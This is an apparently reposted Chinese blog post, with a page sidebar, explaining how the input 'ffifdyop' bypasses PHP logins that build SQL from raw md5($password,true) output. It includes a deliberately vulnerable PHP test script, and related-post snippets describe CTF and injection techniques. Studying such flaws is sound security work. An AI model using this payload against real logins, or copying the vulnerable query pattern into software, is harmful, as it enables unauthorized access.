MD5加密后的SQL 注入

最新推荐文章于 2024-06-21 17:57:22 发布
最新推荐文章于 2024-06-21 17:57:22 发布
阅读量1.3w 收藏 5
点赞数
分类专栏: 非安全 文章标签: md5 sqlinjection

转自:http://www.joychou.org/index.php/web/SQL-injection-with-raw-MD5-hashes.html?utm_source=tuicool

今天看到 $sql = "SELECT * FROM admin WHERE pass = '".md5($password,true)."'"; 这样一个sql,其实可以注入。

思路比较明确,当md5后的hex转换成字符串后,如果包含 'or'<trash> 这样的字符串,那整个sql变成

SELECT * FROM admin WHERE pass = ''or'6<trash>'

很明显可以注入了。

难点就在如何寻找这样的字符串,我只是顺手牵羊,牵了一个。。

提供一个字符串:ffifdyop

md5后,276f722736c95d99e921722cf9ed621c

再转成字符串: 'or'6<trash>

测试代码:

<?php 
error_reporting(0);
$link = mysql_connect('localhost', 'root', '');
if (!$link) { 
  die('Could not connect to MySQL: ' . mysql_error()); 
} 
// 选择数据库
$db = mysql_select_db("test", $link);
if(!$db)
{
  echo 'select db error';
  exit();
}
// 执行sql
$password = "ffifdyop";
$sql = "SELECT * FROM admin WHERE pass = '".md5($password,true)."'";
var_dump($sql);
$result=mysql_query($sql) or die('<pre>' . mysql_error() . '</pre>' );
$row1 = mysql_fetch_row($result);
var_dump($row1);
mysql_close($link);
?>

效果:

Turisla
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入md5($password,true)
March97的博客
07-27 2万+
       前几天做了一道CTF的题目,是在”实验吧“的一道简单的web题目,当然这道题目很多人都解出来了,因为它的.php文件名就是答案。        他的网页链接里面的php文件名就是’ffifdyop.php‘。          上面的’ffifdyop‘就是我们要输入的密码。哦,忘了介绍,这道题目只需要表单提交密码。       当然如果直接输入ffifdyop,提交后就能出...
sql md5 加密函数
08-19
* Name: T-SQL MD5算法实现 * Author: Rambo Qian * Create Date: 2003-04-10 * Last Modified by: Rambo Qian * Last Update Date: 2003-04-16 * Version: V1.0.00
SQL注入篇(hw从零开始)
最新发布
qq_68727073的博客
06-21 530
下载地址: GitHub - zhuifengshaonianhanlu/pikachu: 一个好玩的Web安全-漏洞测试平台 下载地址:小皮面板(phpstudy) - 让天下没有难配的服务器环境!https://github.com/sqlmapproject/sqlmap/zipball/master环境:python2、3 皆可 前端数据再传入后端时 没有做过滤,导致传入的数据被拼接到SQL语句中,当做SQL语句执行。 危害:导致数据库受损(被脱裤、数据库被
Sqlserver MD5 加密
baoshan的专栏
03-01 2598
IF EXISTS(SELECT * FROM dbo.sysobjects WHERE id = OBJECT_ID(N[dbo].[MD5_m_OnBits]) AND xtype IN(NFN, NIF, NTF))DROP FUNCTION [dbo].[MD5_m_OnBits]GO/********************************************
Jarvis OJ–Login 透过MD5()下的SQL注入学习MD5加密
超人学飞的日子
07-01 383
遇到一道CTF题目:http://web.jarvisoj.com:32772/找到了这个题目最早出现的地方和原理解释:http://cvk.posthaven.com/sql-injection-with-raw-md5-hashes哎,都是8年前的题目了,感觉自己进展好慢。看解释原理也不复杂,就是MD5()函数中参数为true时,输出形式为原始二进制格式,如果,找到一个字符串MD5后得到的原始...
SQL注入直接修改管理员密码的MD5值
收集盒 Book box
06-27 2718
 经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?今天俺就整了个新方法,直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)测试如下:http://www.tmdsb.com/news.asp?id=121在地址后输入单引号,显示Microsoft OLE DB
sql中使用md5
拾忆的博客
05-26 1万+
一、前言 这两天对之前的项目做出一些总结,发现是有过对数据库中字段使用md5操作的sql,于是记录发出来。 二、正文 有时候在数据库表的设计中,我们对一条数据的标识有时候不只是id,还有可能是很多个字段组合在一起作为唯一标志。 如对于一本书,book表有以下字段,name,year,author,version,price。其中name(书名),year(发表年份),author(作者),...
一个简单的后台与数据库交互的登录与注册[sql注入处理、以及MD5加密]
09-10
本项目中,我们关注的重点是SQL注入处理和MD5加密,这两个方面对于数据安全至关重要。 首先,SQL注入是一种常见的网络安全攻击手段,攻击者通过输入恶意的SQL语句来获取、修改、删除数据库中的敏感信息。为了防止...
C#实现登陆程序(MD5加密SQL存储过程防注入攻击)
03-20
在本文中,我们将深入探讨如何使用C#编程语言来实现一个登录程序,该程序结合了MD5加密技术和SQL存储过程,以确保用户密码的安全并防止SQL注入攻击。首先,我们来了解一下这两个关键技术。 MD5(Message-Digest ...
ssm框架搭建的MD5加密网站
03-20
为了防止跨站请求伪造(CSRF)和SQL注入等攻击,还需要在表单提交时进行相应的验证和过滤。 总的来说,这个"SSM框架搭建的MD5加密网站"项目涉及了后端架构设计、数据库操作、密码加密、安全防护以及前端用户界面等...
spring sqlite3,sqlMD5
01-14
在IT行业中,Spring框架、SQLite3数据库和SQL语言以及MD5加密是四个关键的技术领域。本文将深入探讨这些技术,并结合它们之间的相互作用,提供一个详细的解析。 首先,Spring框架是一个广泛使用的Java企业级应用...
经典T-SQL-MD5算法实现
08-06
能过sql server TSQL 实现MD5算法过程函数。
SQL注入漏洞演示源代码
01-22
SQL注入漏洞是网络安全领域中的一个重要话题,它涉及到数据库管理和Web应用程序设计。此“SQL注入漏洞演示源代码”可能提供了一种模拟环境,帮助我们理解这种漏洞的工作原理以及如何防范它。 SQL注入是一种攻击手法...
登录注册功能使用md5对密码进行加密
热门推荐
03-22 1万+
    之前一直搞不清楚md5加密,从网上查了好多资料、看了几个视频都没实现成功。这一次参加学校的集中实习,培训老师带我们简单实现了一下。    要简单实现并不难,先从网上down一个简单的md5算法:package com.train.util; import java.math.BigInteger; import java.security.MessageDigest; import jav...
MD5加密下的SQL注入
qq_35900276的博客
11-03 5462
转自:http://www.joychou.org/index.php/web/SQL-injection-with-raw-MD5-hashes.html?utm_source=tuicool 做题的时候看到下面这个句子: $sql="select password from users where password='".md5($password,true)."'" 这里面的md5
第27天:WEB攻防-通用漏洞&SQL注入&Tamper脚本&Base64&Json&md5等
wuqingsix的博客
11-19 519
不同payload类型的注入方式构造:字符型,搜索形 ,加密,编码形。宽字节的构造和绕过, sqlmap的tamper字典使用
SQL注入之 base64注入攻击
coderge's CSDN Blog.
09-19 2847
1 base64注入代码分析 在base64注入页面中,程序获取GET参数ID,利用base64_decode ()对参数ID进行base64解码,然后直接将解码后的$id拼接到select语句中进行查询,通过while循环将查询结果输出到页面,代码如下所示。 <?php header("Content-Type:text/html;charset=utf8"); $con=mysqli_connect("localhost","root","qwer","security"); mysqli_
Raw MD5 Hash引发的注入
qq_37466661的博客
08-29 279
md5 字符逃逸 注入
MD5 绕过第三式:ffifdyop
两个月亮
09-30 456
二进制数据会被转化为 ASCII 字符✨,如果某一个字符串在经过 MD5 哈希后,得到的二进制数据转化为 ASCII 文本后恰能够与周围的文本形成 SQL 注入语句,那么我们就能够绕过限制,成功发起攻击😈。ffifdyop 经过两次转化后得到的结果是 'or'6�]��!r,��b。位于 or 两侧的单引号可以用于闭合两端的单引号,使得 or 不再被 MySQL 认为是字符串,而是一个关键字,发挥着 逻辑或运算符 的作用。
DES和MD5防SQL注入
06-08
DES和MD5都是加密算法,不能直接用于防止SQL注入攻击,但可以在某些情况下用于增强系统的安全性。 DES是一种对称加密算法,可以用于对敏感数据进行加密,以保护数据在传输和存储过程中的安全性。在防止SQL注入攻击时,可以将用户输入的敏感数据进行DES加密,然后再传输到后台进行处理和存储,防止攻击者通过注入SQL语句获取到敏感数据。 MD5是一种单向散列函数,可以将任意长度的数据转换为固定长度的哈希值,常用于对密码进行加密。在防止SQL注入攻击时,可以将用户输入的密码进行MD5加密,然后再与后台存储的密文进行比较,以保护用户的密码安全。但需要注意的是,由于MD5算法已经被证明存在安全漏洞,因此建议使用更加安全的哈希算法,如SHA-256或SHA-512。 需要注意的是,加密算法只是增强系统安全性的一种手段,在防止SQL注入攻击时,还需要结合其他的安全措施,如参数化查询、输入过滤、限制操作权限等,以构建更加安全可靠的系统。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值